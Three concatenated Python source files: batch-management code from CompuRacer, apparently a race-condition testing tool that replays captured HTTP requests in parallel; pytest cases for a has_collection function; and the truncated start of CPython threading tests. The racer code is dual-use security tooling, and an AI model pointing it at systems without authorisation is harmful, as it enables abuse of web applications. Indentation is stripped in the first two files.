self.print_formatted(f"Cannot create batch: Batch name is already used!", utils.QType.ERROR)
return -1
new_batch = Batch(name, self.BATCHES_RENDERED_FILE_DIR, allow_redirects, sync_last_byte, send_timeout)
self.__change_state('batches', new_batch, sub_search=name)
self.print_formatted(f"Created a new batch:", utils.QType.INFORMATION)
self.print_formatted(new_batch.get_summary(), utils.QType.BLUE)
if set_current_batch:
return self.set_curr_batch_by_name(self, name)
@staticmethod
def comm_batches_get_project(self):
if 'project_name' not in self.state or self.state['project_name'] == "":
self.print_formatted(f"The current project name prefix is empty.", utils.QType.INFORMATION)
return -1
self.print_formatted(f"Current project name prefix: '{self.state['project_name']}'", utils.QType.INFORMATION)
@staticmethod
def comm_batches_set_project(self, name=None):
if name is None:
self.__change_state('project_name', "")
else:
self.__change_state('project_name', name + "_")
self.print_formatted(f"Current project name prefix: '{self.state['project_name']}'", utils.QType.INFORMATION)
@staticmethod
def comm_batches_get_contents(self, index, full_contents=False, get_string=False):
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
if get_string:
ret_str = "Batch contents:\n"
ret_str += self.state['batches'][name].get_summary(full_contents) + "\n"
ret_str += self.get_specific_requests(self, self.state['batches'][name].get_reqs(), get_str=True)
return ret_str
else:
self.print_formatted(f"Batch contents:", utils.QType.INFORMATION)
self.print_formatted(f"{self.state['batches'][name].get_summary(full_contents)}", utils.QType.NONE)
self.get_specific_requests(self, self.state['batches'][name].get_reqs())
@staticmethod
def comm_batches_get_results(self, index, get_tables=False, get_groups=False):
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
self.print_formatted(f"Batch results:", utils.QType.INFORMATION)
results = self.state['batches'][name].get_last_results(get_tables, get_groups)
if not results:
self.print_formatted(f"No results yet.", utils.QType.NONE)
else:
self.print_formatted_multi(f"Results:\n{results}",
default_type=utils.QType.NONE,
special_types=self.get_batch_result_formatting()
)
@staticmethod # internal usage
def comm_batches_comp_resp_groups(self, index, group_nr_1, group_nr_2, request_id=None):
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
return self.comp_batch_resp_groups_by_name(self, name, group_nr_1, group_nr_2, request_id)
@staticmethod
def comm_batches_rename(self, name_new, index=None):
name_new = self.add_prefix(self, name_new)
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
if name_new in self.state['batches']:
self.print_formatted(f"Cannot rename batch '{name}' to '{name_new}': New batch name already exists!", utils.QType.ERROR)
return -1
if not self.remove_batch_file(self, name):
self.print_formatted(f"Cannot remove old batch file from state, please make sure it is gone.",
utils.QType.WARNING)
self.__change_state('batches', value=self.state['batches'].pop(name, None), sub_search=name_new)
self.state['batches'][name_new].set_name(name_new)
if name == self.state['current_batch']:
self.__change_state('current_batch', name_new)
self.print_formatted(f"Batch successfully renamed: '{name}' to '{name_new}'.",
utils.QType.INFORMATION)
@staticmethod
def comm_batches_copy(self, name_new, index=None):
name_new = self.add_prefix(self, name_new)
name = self.batch_index_to_name(self, index)
if name == -1:
return -1
if name_new in self.state['batches']:
self.print_formatted(f"Cannot copy batch '{name}' to '{name_new}': New batch name already exists!", utils.QType.ERROR)
return -1
self.__change_state('batches', copy.deepcopy(self.state['batches'][name]), sub_search=name_new)
self.state['batches'][name_new].set_name(name_new)
if name == self.state['current_batch']:
self.__change_state('current_batch', name_new)
self.print_formatted(f"Batch successfully copied: '{name}' to '{name_new}'.",
utils.QType.INFORMATION)
@staticmethod
def comm_batches_export(self, first_index=None, last_index=None):
names = self.batch_indices_to_names(self, first_index, last_index)
if names == -1:
return -1
for name in names:
self.exp_batch_by_name(self, name)
@staticmethod
def comm_batches_import_list(self):
self.print_formatted(f"Table of batches that can be imported:", utils.QType.INFORMATION)
output = tabulate([[name.split(".")[0]] for name in self.list_exp_batch_files(self)],
["Name"], showindex="always", tablefmt="simple") + "\n"
self.print_formatted(output, utils.QType.NONE)
@staticmethod
def comm_batches_import(self, first_index=None, last_index=None):
if first_index is None and last_index is None and self.dialog_queue is None:
self.print_formatted(f"Importing via dialog failed: the system does not support it!",
utils.QType.ERROR)
return -1
filenames = self.imp_batch_indices_to_names(self, first_index, last_index)
# check if dialog must be shown
if filenames == -1:
# select one or more batch files to import
filenames = None
while not filenames:
filenames = self.select_files(self, "Select one or more batch export files", ".json")
if not filenames and not self.command_processor.accept_yes_no("Selected files are not valid, retry?", utils.QType.WARNING):
return -1
success_batches = []
failed_batches = []
for filename in filenames:
if self.imp_batch_by_name(self, filename) == -1:
failed_batches.append(filename)
else:
success_batches.append(filename)
if success_batches:
self.print_formatted(f"Importing of {len(success_batches)} batches(s) successful.", utils.QType.INFORMATION)
if failed_batches:
self.print_formatted(f"Importing of the following batches(s) failed:\n\t{failed_batches} ",
utils.QType.WARNING)
@staticmethod
def comm_batches_regroup(self):
self.print_formatted(f"Regrouping all batches..", utils.QType.INFORMATION)
time.sleep(0.25)
for batch_name in tqdm(list(self.state['batches'].keys()), desc="Grouping batches", ncols=self.progress_bar_width):
batch = self.state['batches'][batch_name]
batch.redo_all_grouping(force=True)
time.sleep(0.25)
self.print_formatted(f"Done.", utils.QType.INFORMATION)
# ------------------------------------- Batch command helpers ------------------------------------- #
# looks up all corresponding !importable! batch names
# will fail if one lookup fails
@staticmethod
def imp_batch_indices_to_names(self, start_index=None, end_index=None):
if start_index is None or end_index is None:
name = self.imp_batch_index_to_name(self, start_index)
if name == -1:
return -1
return [name]
names = []
indices = self.list_exp_batch_files(self)
for i in range(start_index, end_index + 1):
names.append(self.imp_batch_index_to_name(self, i, indices))
if -1 in names:
return -1
return names
# looks up all corresponding batch names
# will fail if one lookup fails
@staticmethod
def batch_indices_to_names(self, start_index, end_index):
if start_index is None or end_index is None:
name = self.batch_index_to_name(self, start_index)
if name == -1:
return -1
return [name]
names = []
indices = self.get_batch_indices()
for i in range(start_index, end_index + 1):
names.append(self.batch_index_to_name(self, i, indices))
if -1 in names:
return -1
return names
@staticmethod
def imp_batch_index_to_name(self, index, indices=None):
if index is None:
return -1
if not type(index) is int:
self.print_formatted(f"Batch index must be an integer! This is not the case: '{index}'", utils.QType.ERROR)
return -1
if not indices:
indices = self.list_exp_batch_files(self)
if index < 0 or index >= len(indices):
self.print_formatted(f"Batch index '{index}' does not exist!", utils.QType.ERROR)
return -1
return os.path.abspath(self.BATCHES_EXP_FILE_DIR + indices[index])
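    # resolves a batch table index to its batch name; a None index falls back to the current batch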
@staticmethod
def batch_index_to_name(self, index, indices=None):
if index is None:
if not self.state['current_batch']:
self.print_formatted(f"Cannot select current batch: There is no current batch!", utils.QType.ERROR)
return -1
return self.state["current_batch"]
if not type(index) is int:
self.print_formatted(f"Batch index must be an integer! This is not the case: '{index}'", utils.QType.ERROR)
return -1
if not indices:
indices = self.get_batch_indices()
if index < 0 or index >= len(indices):
self.print_formatted(f"Batch index '{index}' does not exist!", utils.QType.ERROR)
return -1
return indices[index]
@staticmethod # internal usage
def set_curr_batch_by_name(self, name, immediate_allowed=False):
if not immediate_allowed and name == self.immediate_batch_name:
self.print_formatted(f"Not allowed to set immediate batch as current batch from interface!", utils.QType.ERROR)
return -1
self.__change_state('current_batch', name)
self.print_formatted(f"Set current batch to batch with name '{name}'.", utils.QType.INFORMATION)
@staticmethod # internal usage
def comp_batch_resp_groups_by_name(self, batch_name, group_nr_1, group_nr_2, request_id=None):
try:
results, request_id = self.state['batches'][batch_name].compare_group_repr(group_nr_1, group_nr_2, request_id)
if not results or results == -1:
self.print_formatted(f"No results yet.", utils.QType.NONE)
else:
self.print_formatted(f"Comparison of result groups {group_nr_1} and {group_nr_2} in request '{request_id}' of batch '{batch_name}':", utils.QType.INFORMATION)
self.colorprint_comp_results(self, results)
except Exception as e:
self.print_formatted(f"{e}", utils.QType.ERROR)
return -1
@staticmethod # internal usage
def exp_batch_without_requests_by_name(self, folder, name):
the_batch = self.state['batches'][name]
# get batch as json-compatible dict
js_batch = self.jsonify_batch(the_batch)
exp_file = f"{name}.json"
exp_path = folder + exp_file
if os.path.exists(exp_path):
os.remove(exp_path)
with open(exp_path, 'w') as file:
utils.store_json_file(exp_path, js_batch)
@staticmethod # internal usage
def exp_batch_by_name(self, name):
self.print_formatted(f"Exporting batch '{name}'..", utils.QType.INFORMATION)
the_batch = self.state['batches'][name]
# get all required reqs
reqs = the_batch.get_reqs()
full_reqs = {}
for req in reqs:
full_reqs[req] = self.state['requests'][req]
# get batch as json-compatible dict
js_batch = self.jsonify_batch(the_batch)
js_batch['requests'] = full_reqs
if not os.path.exists(self.BATCHES_EXP_FILE_DIR):
os.mkdir(self.BATCHES_EXP_FILE_DIR)
exp_file = f"{name}.json"
if os.path.exists(self.BATCHES_EXP_FILE_DIR + exp_file):
randomness = utils.randomword(5)
self.print_formatted(f"Batch already exported once: adding randomness.", utils.QType.INFORMATION)
exp_file = exp_file.replace(".json", "") + "_random_" + randomness + ".json"
exp_path = self.BATCHES_EXP_FILE_DIR + exp_file
with open(exp_path, 'w') as file:
utils.store_json_file(exp_path, js_batch)
self.print_formatted(f"Batch exported successfully to '{exp_path}'", utils.QType.INFORMATION)
# open a dialog to pick a json file
@staticmethod
def select_files(self, title, extension):
if not os.path.exists(self.BATCHES_EXP_FILE_DIR):
os.mkdir(self.BATCHES_EXP_FILE_DIR)
start_dir = os.path.abspath(self.BATCHES_EXP_FILE_DIR)
filetypes = ("Target files", "*" + extension), ("all files", "*.*")
title = title + "(." + extension + ")"
self.dialog_queue.put({'title': title, 'filetypes': filetypes, 'start_dir': start_dir})
return self.dialog_queue.get()
@staticmethod
def imp_batch_without_requests_by_name(self, filename):
# load selected batch from file
batch_import = utils.load_json_file(filename)
if not batch_import:
self.print_formatted(
f"Cannot import batch: {filename}",
utils.QType.ERROR)
return -1
batch = self.objectify_batch(self, batch_import)
# adding the new batch
self.state['changed'] = True
if 'batches' not in self.state:
self.state['batches'] = {}
self.state['batches'][batch.name] = batch
#self.__change_state('batches', batch, sub_search=batch.name)
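    # imports a batch export file: re-adds its requests (remapping ids on collisions), then adds the batch under a unique name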
@staticmethod
def imp_batch_by_name(self, filename):
self.print_formatted(f"Importing batch file '{filename}'..", utils.QType.INFORMATION)
# load selected batch from file
batch_import = utils.load_json_file(filename)
batch = self.objectify_batch(self, batch_import)
if 'requests' not in batch_import:
self.print_formatted(
f"Cannot import batch: The file is missing the matching requests.\n\tIs this a state file maybe?",
utils.QType.WARNING)
return -1
requests = batch_import['requests']
# add the requests if necessary
self.print_formatted(f"Importing requests..", utils.QType.INFORMATION)
updated_ids = {}
for req_id, req in requests.items():
# remove the old id and fetch new
old_id = req_id
del req['id']
_, new_id = self.add_request(self, req, used_from_interface=True)
# the update key-method assumes the add_request method avoids collisions
if old_id != new_id:
updated_ids[old_id] = new_id
# update renewed ids in batch
if updated_ids:
batch.update_ids(updated_ids)
# add batch itself
was_current = False
while True:
if batch.name == self.immediate_batch_name:
self.print_formatted(f"You are not allowed to use the immediate batch name 'Imm'.", utils.QType.WARNING)
elif batch.name in self.state['batches']:
if self.command_processor.accept_yes_no(f"The batch name '{batch.name}' already exists, overwrite it?",
utils.QType.WARNING):
# removing current batch
if batch.name == self.state['current_batch']:
was_current = True
self.rem_batch_by_name(self, batch.name, True)
break
elif len(batch.name) > 0:
# a valid name!
break
batch.name = self.command_processor.accept_of_type("Please provide a new name for the batch:", str,
utils.QType.INFORMATION)
# adding the new batch
self.__change_state('batches', batch, sub_search=batch.name)
if was_current:
self.__change_state('current_batch', batch.name)
self.print_formatted(f"Batch '{batch.name}' with {len(requests.keys())} requests imported successfully.",
utils.QType.INFORMATION)
@staticmethod
def comm_batches_remove(self, first_index=None, last_index=None, immediate_allowed=False):
names = self.batch_indices_to_names(self, first_index, last_index)
if names == -1:
return -1
for name in names:
self.rem_batch_by_name(self, name, immediate_allowed)
@staticmethod
def rem_batch_by_name(self, name=None, immediate_allowed=False):
"""
Removes the batch with this name from the state
:param self: reference to the CompuRacer
:param name: name of the batch
:param immediate_allowed:
:return: 0 on success and -1 on error
"""
if name == -1:
return -1
if not immediate_allowed and name == self.immediate_batch_name:
self.print_formatted(f"Not allowed to remove immediate batch from interface!", utils.QType.ERROR)
return -1
is_current_batch = self.state['current_batch'] is not None and name == self.state['current_batch']
if immediate_allowed:
self.state['batches'][name].remove_the_files()
self.__change_state('batches', sub_search=name, do_delete=True)
if is_current_batch:
self.__change_state('current_batch', [])
else:
warning_string = f"Are you sure you want to remove the batch with name '{name}'?"
if is_current_batch:
warning_string += "\nThis is the current batch!"
if self.command_processor.accept_yes_no(warning_string, utils.QType.WARNING):
self.state['batches'][name].remove_the_files()
if not self.remove_batch_file(self, name):
self.print_formatted(f"Cannot remove old batch file from state, please make sure it is gone.",
utils.QType.WARNING)
self.__change_state('batches', sub_search=name, do_delete=True)
if is_current_batch:
self.__change_state('current_batch', [])
self.print_formatted(f"Batch with name '{name}' is removed.", utils.QType.INFORMATION)
else:
self.print_formatted(f"Removal of batch cancelled.", utils.QType.INFORMATION)
@staticmethod
def format_request_form_body(the_request):
the_request = copy.deepcopy(the_request)
# sort and decode cookies
if 'Cookie' in the_request['headers']:
cookies = urllib.parse.unquote(the_request['headers']['Cookie']).split("; ")
cookies = sorted(cookies)
the_request['headers']['Cookie'] = "; ".join(cookies)
# format body
if 'body' in the_request and len(the_request['body']) > 0:
if type(the_request['body']) is dict:
return the_request
if 'Content-Type' in the_request['headers'] and \
(the_request['headers']['Content-Type'].startswith("multipart/form-data") or
the_request['headers']['Content-Type'].startswith("application/x-www-form-urlencoded")):
key_values = [key_values.split("=") for key_values in the_request['body'].split("&")]
new_body = {}
for key_value in key_values:
if len(key_value) < 2:
# skip invalid keys
continue
new_body[urllib.parse.unquote(key_value[0])] = urllib.parse.unquote(key_value[1])
the_request['body'] = new_body
return the_request
@staticmethod
def list_exp_batch_files(self):
return sorted(list(os.listdir(self.BATCHES_EXP_FILE_DIR)))
@staticmethod
def remove_batch_file(self, name):
for file in os.listdir(self.CLIENT_BATCHES_LOC):
if file == name + ".json":
os.remove(self.CLIENT_BATCHES_LOC + file)
return True
return False
# -------------------------------------------------------------------------------------------------------- #
# ------------------------------------- Curr batch command functions ------------------------------------- #
# -------------------------------------------------------------------------------------------------------- #
@staticmethod
def comm_curr_get_contents(self, full_contents=False):
"""
Gets the requests and their settings of the current batch
:param self: reference to the CompuRacer
        :param full_contents: if True, shows the parallel and sequential settings visually
:return: 0 on success and -1 on error
"""
return self.comm_batches_get_contents(self, None, full_contents)
@staticmethod
def comm_curr_change_redirects(self, enable_redirects=True):
"""
Changes whether the current batch follows redirects when sending requests
:param self: reference to the CompuRacer
:param enable_redirects: if True, it follows redirects
:return: 0 on success and -1 on error
"""
if not self.state['current_batch']:
self.print_formatted(f"Cannot add change redirects of current batch: There is no current batch!", utils.QType.ERROR)
return -1
self.state['batches'][self.state['current_batch']].set_allow_redirects(enable_redirects)
self.print_formatted(f"Set follow redirects of current batch to: '{enable_redirects}'", utils.QType.INFORMATION)
@staticmethod
def comm_curr_change_sync(self, enable_sync=True):
"""
Changes whether the current batch syncs the last byte of the request content (if any)
:param self: reference to the CompuRacer
:param enable_sync: if True, it syncs the last byte
:return: 0 on success and -1 on error
"""
if not self.state['current_batch']:
self.print_formatted(f"Cannot add change last byte sync of current batch: There is no current batch!", utils.QType.ERROR)
return -1
self.state['batches'][self.state['current_batch']].set_sync_last_byte(enable_sync)
self.print_formatted(f"Set last byte sync of current batch to: '{enable_sync}'", utils.QType.INFORMATION)
@staticmethod
def comm_curr_change_timeout(self, send_timeout=20):
"""
        Sets the current batch send timeout (default 20 seconds).
:param self: reference to the CompuRacer
:param send_timeout: the send timeout
:return: 0 on success and -1 on error
"""
if not self.state['current_batch']:
self.print_formatted(f"Cannot add change send timeout of current batch: There is no current batch!", utils.QType.ERROR)
return -1
if send_timeout < 1:
self.print_formatted(f"The send timeout must be >= 1! Input: {send_timeout} seconds", utils.QType.ERROR)
return -1
self.state['batches'][self.state['current_batch']].set_send_timeout(send_timeout)
self.print_formatted(f"Set send timeout of current batch to: '{send_timeout}'", utils.QType.INFORMATION)
@staticmethod
def comm_curr_get_results(self, get_tables=False, get_groups=False):
"""
Get the latest results of the current batch
:param self: reference to the CompuRacer
:param get_tables: whether to include summary tables about the results
:param get_groups: whether to show the group representatives
:return: 0 on success and -1 on error
"""
return self.comm_batches_get_results(self, None, get_tables, get_groups)
@staticmethod
def comm_curr_compare_groups(self, group_nr_1, group_nr_2, request_id=None):
"""
Within the current batch, it compares the result group representatives selected
:param self: reference to the CompuRacer
:param group_nr_1: the first group id to compare
:param group_nr_2: the second group id to compare
:param request_id: the request id, or if None, the first request of the batch (alphabetically)
:return: 0 on success and -1 on error
"""
return self.comm_batches_comp_resp_groups(self, None, group_nr_1, group_nr_2, request_id)
# NOTE: it does not overwrite an item with the same id & wait_time.
@staticmethod
def comm_curr_add(self, request_id, wait_time=0, dup_par=1, dup_seq=1):
"""
Adds the request with this wait time and the parallel and sequential values to the current batch
:param self: reference to the CompuRacer
:param request_id: the id of the request
:param wait_time: the wait time of the request before sending it
:param dup_par: the parallel duplication
        :param dup_seq: the sequential duplication
        :return: 0 on success and -1 on error
"""
if request_id not in self.state['requests']:
self.print_formatted(f"Cannot add a request to current batch: The request with id '{request_id}' is not in the request list!",
utils.QType.ERROR)
return -1
if not self.state['current_batch']:
self.print_formatted(f"Cannot add a request to current batch: There is no current batch! First, select a current batch.", utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
try:
curr_batch.add(request_id, wait_time, dup_par, dup_seq, False)
except Exception as e:
self.print_formatted(f"Cannot add a request to current batch:\n\t{e}", utils.QType.ERROR)
return -1
self.print_formatted(f"The request was added to the current batch:\n"
f"{curr_batch.get_info(request_id, wait_time)}",
utils.QType.INFORMATION)
# NOTE: it does not overwrite an item with the same id & wait_time.
@staticmethod
def comm_curr_update(self, request_id, wait_time=0, dup_par=1, dup_seq=1):
"""
Updates the parallel and sequential values of the request with this wait_time in the current batch
:param self: reference to the CompuRacer
:param request_id: the id of the request
:param wait_time: the wait time of the request before sending it
:param dup_par: the parallel duplication
        :param dup_seq: the sequential duplication
:return: 0 on success and -1 on error
"""
if request_id not in self.state['requests']:
self.print_formatted(
f"Cannot update a request in the current batch: The request with id '{request_id}' is not in this batch!",
utils.QType.ERROR)
return -1
if not self.state['current_batch']:
self.print_formatted(
f"Cannot update a request in the current batch: There is no current batch! First, select a current batch.",
utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
try:
old_state = curr_batch.get_info(request_id, wait_time)
curr_batch.add(request_id, wait_time, dup_par, dup_seq, True)
except Exception as e:
self.print_formatted(f"Cannot update request in current batch:\n\t{e}", utils.QType.ERROR)
return -1
self.print_formatted(f"The request was updated in the current batch:\n"
f"Old: {old_state}\n"
f"New: {curr_batch.get_info(request_id, wait_time)}\n",
utils.QType.INFORMATION)
@staticmethod
def comm_curr_get_ignore(self):
if not self.state['current_batch']:
self.print_formatted(
f"Cannot get ignored fields in grouping of results in the current batch:\n"
f"\tThere is no current batch! First, select a current batch.",
utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
fields = curr_batch.get_ignored_fields()
self.print_formatted(f"The ignored fields in grouping of results in the current batch:\n\t"
f"{fields}\n", utils.QType.INFORMATION)
@staticmethod
def comm_curr_add_ignore(self, field_name):
if not self.state['current_batch']:
self.print_formatted(
f"Cannot add field to ignored fields in grouping of results in the current batch:\n"
f"\tThere is no current batch! First, select a current batch.",
utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
if curr_batch.add_ignored_field(field_name) == -1:
self.print_formatted(
f"Cannot add field to ignored fields in grouping of results in the current batch:\n"
f"\tThe field is already ignored!",
utils.QType.WARNING)
return -1
self.print_formatted(f"Successfully added the ignored field '{field_name}' "
f"in grouping of results in the current batch", utils.QType.INFORMATION)
@staticmethod
def comm_curr_reset_ignore(self):
if not self.state['current_batch']:
self.print_formatted(
f"Cannot add field to ignored fields in grouping of results in the current batch:\n"
f"\tThere is no current batch! First, select a current batch.",
utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
if curr_batch.reset_ignored_fields() == -1:
self.print_formatted(
f"Cannot reset ignored fields in grouping of results in the current batch:\n"
f"\tThey are already the default values.",
utils.QType.WARNING)
return -1
fields = curr_batch.get_ignored_fields()
self.print_formatted(f"Successfully resetted the ignored fields in grouping of results in the current batch:\n\t"
f"{fields}\n", utils.QType.INFORMATION)
@staticmethod
def comm_curr_remove(self, request_id=None, wait_time=None):
"""
Removes requests from the current batch
:param self: reference to the CompuRacer
:param request_id: the request to remove, or if None, all requests
:param wait_time: the wait_time of the request to remove, or if None, all regardless of wait_time
:return: 0 on success and -1 on error
"""
if not self.state['current_batch']:
self.print_formatted(f"Cannot remove a request from current batch: There is no current batch! First, select a current batch.", utils.QType.ERROR)
return -1
curr_batch = self.state['batches'][self.state['current_batch']]
if curr_batch.is_empty():
self.print_formatted(f"Cannot remove a request from current batch: The current batch is empty!", utils.QType.ERROR)
return -1
if request_id is None:
# remove all items from the batch
question = "Are you sure you want to remove all requests from the current batch?"
elif wait_time is None:
# remove all items with a certain ID from the batch
question = f"Are you sure you want to remove all requests with id '{request_id}' from the current batch?"
else:
# remove a specific item with a certain ID and wait_time from the batch
question = f"Are you sure you want to remove the request with id '{request_id}' and wait_time '{wait_time}' from the current batch?"
if self.command_processor.accept_yes_no(question, utils.QType.WARNING):
num_removed = curr_batch.remove(request_id, wait_time)
self.print_formatted(f"All matching requests are removed from the current batch.\nNumber: {num_removed}", utils.QType.INFORMATION)
else:
self.print_formatted(f"Removal of current batch requests cancelled.", utils.QType.INFORMATION)
# ------------------------------------------------------------------------------------------------- #
# ------------------------------------- Main helper functions ------------------------------------- #
# ------------------------------------------------------------------------------------------------- #
# used by REST server
def add_request_from_json(self, a_json_request):
self.add_request(self, utils.read_json(a_json_request))
# used by REST server
def trigger_immediate(self):
if self.immediate_batch_name not in self.state['batches']:
return -1
if self.state['immediate_mode'] == "on":
# send the immediate batch
return self.comm_batches_send(self, self.get_index_by_name(self.immediate_batch_name), self.state['immediate_print'], True)
def get_batch_indices(self):
return sorted(self.state['batches'].keys())
def get_index_by_name(self, name):
if name in self.state['batches']:
return self.get_batch_indices().index(name)
else:
return -1
# ------------------------------------------------------------------------------------------------ #
# --------------------------- Print, convert, load and store functions --------------------------- #
# ------------------------------------------------------------------------------------------------ #
@staticmethod
def jsonify_batches(the_state):
"""
Makes sure the batch content in the state can be saved as JSON.
It will change a dict with tuple-keys to an array of key and value tuples
:param the_state: reference to the CompuRacer state
:return: the updated state
"""
if not the_state['batches']:
return the_state
for name in the_state['batches'].keys():
the_state['batches'][name] = the_state['batches'][name].get_as_dict()
return the_state
@staticmethod
def jsonify_batch(the_batch):
"""
Makes sure the content of this batch can be saved as JSON.
It will change a dict with tuple-keys to an array of key and value tuples
:param the_batch: the batch to update
:return: the updated batch
"""
return the_batch.get_as_dict()
@staticmethod
def objectify_batches(self, the_state):
"""
Undoes the jsonify_batches function.
:param the_state: reference to the CompuRacer state
:return: the updated state
"""
if not the_state['batches']:
return the_state
for name in the_state['batches'].keys():
the_state['batches'][name] = self.objectify_batch(self, the_state['batches'][name])
return the_state
@staticmethod
def objectify_batch(self, the_batch):
"""
Undoes the jsonify_batch function.
:param the_batch: the batch to update
:return: the updated batch
"""
return Batch.create_from_dict(the_batch, self.BATCHES_RENDERED_FILE_DIR)
# should only be called by command handlers with print_buffered=False
def print_formatted_multi(self, text, default_type=utils.QType.NONE, special_types=None, print_buffered=False):
if special_types is None:
special_types = dict()
for line in text.split("\n"):
string_type = default_type
for matcher in special_types.keys():
if re.search(matcher, line):
string_type = special_types[matcher]
if print_buffered:
self.command_processor.print_queued(line, string_type)
else:
self.command_processor.print_formatted(line, string_type)
# should only be called by command handlers with print_buffered=False
def print_formatted(self, text, string_type=utils.QType.NONE, print_buffered=False):
if print_buffered:
self.command_processor.print_queued(text, string_type)
else:
self.command_processor.print_formatted(text, string_type)
# should only be called by command handlers!
def __load_json(self, path, backup_path, msg=None):
return utils.load_json_file(path, backup_path, msg, self.state['colored_output'])
# should only be called by command handlers!
def __store_json(self, json_path, json_data, backup_path=None, msg=None):
utils.store_json_file(json_path, json_data, backup_path, msg, self.state['colored_output'])
# access function for state is used to avoid storing an unchanged state
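    # 'variable' selects the top-level state key, 'sub_search' an entry inside it; 'do_delete' deletes instead of assigning 'value'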
def __change_state(self, variable, value=None, sub_search=None, do_delete=False):
self.state['changed'] = True
if sub_search is not None:
if do_delete and self.state[variable] is not None and sub_search in self.state[variable]:
del self.state[variable][sub_search]
else:
if variable not in self.state or self.state[variable] is None:
self.state[variable] = {}
self.state[variable][sub_search] = value
else:
if do_delete and self.state is not None and variable in self.state:
del self.state[variable]
else:
self.state[variable] = value
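# background watchdog: polls the racer state and reports if the batches are ever left as plain dicts instead of Batch objects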
def check_state(racer):
while not racer.is_shutdown:
if racer.state and 'batches' in racer.state and racer.state['batches']:
if not type(list(racer.state['batches'].values())[0]) is Batch:
print("Batches dictified!!!")
break
time.sleep(0.1)
# -------------- main client program & server -------------- #
if __name__ == '__main__':
dialog_queue = Queue()
# initialize the racer
racer = CompuRacer(dialog_queue)
threading.Thread(target=check_state, args=(racer,)).start()
# start the racer
racer.start()
# listen for dialogs
while not racer.is_shutdown:
try:
new_dialog_req = dialog_queue.get(timeout=2)
except queue.Empty:
pass
except Exception as e:
print(e)
else:
dialog_queue.put(filedialog.askopenfilename(
filetypes=new_dialog_req['filetypes'],
title=new_dialog_req['title'],
initialdir=new_dialog_req['start_dir'],
multiple=True
))
root.update()
# exit normally
exit(0)
|
test_has_collection.py
|
import pdb
import pytest
import logging
import itertools
import threading
import time
from multiprocessing import Process
from utils import *
from constants import *
uid = "has_collection"
class TestHasCollection:
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_collection(self, connect, collection):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
assert connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self, collection, dis_connect):
'''
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
'''
with pytest.raises(Exception) as e:
assert dis_connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_has_collection_not_existed(self, connect):
'''
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by has_collection method
expected: False
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
assert connect.has_collection(collection_name)
connect.drop_collection(collection_name)
assert not connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self, connect):
'''
        target: test has_collection with multithread
        method: create a collection, then call has_collection concurrently in multiple threads
        expected: every thread finds the collection
'''
threads_num = 4
threads = []
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
def has():
assert connect.has_collection(collection_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self, connect):
collection_name = ''
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self, connect):
collection_name = None
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, strip_python_stderr, import_module, cpython_only
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import re
import sys
_thread = import_module('_thread')
threading = import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
                     'hp-ux11')
# A trivial mutable counter.
class Counter(object):
    def __init__(self):
        self.value = 0
    def inc(self):
        self.value += 1
    def dec(self):
        self.value -= 1
    def get(self):
        return self.value
class TestThread(threading.Thread):
    def __init__(self, name, testcase, sema, mutex, nrunning):
        threading.Thread.__init__(self, name=name)
        self.testcase = testcase
        self.sema = sema
        self.mutex = mutex
        self.nrunning = nrunning
    def run(self):
        delay = random.random() / 10000.0
        if verbose:
            print('task %s will run for %.1f usec' %
                  (self.name, delay * 1e6))
        with self.sema:
            with self.mutex:
                self.nrunning.inc()
                if verbose:
                    print(self.nrunning.get(), 'tasks are running')
                self.testcase.assertTrue(self.nrunning.get() <= 3)
            time.sleep(delay)
            if verbose:
                print('task', self.name, 'done')
            with self.mutex:
                self.nrunning.dec()
                self.testcase.assertTrue(self.nrunning.get() >= 0)
                if verbose:
                    print('%s is finished. %d tasks are running' %
                          (self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
    # Create a bunch of threads, let each do some work, wait until all are
    # done.
    def test_various_ops(self):
        # This takes about n/3 seconds to run (about n/3 clumps of tasks,
        # times about 1 second per clump).
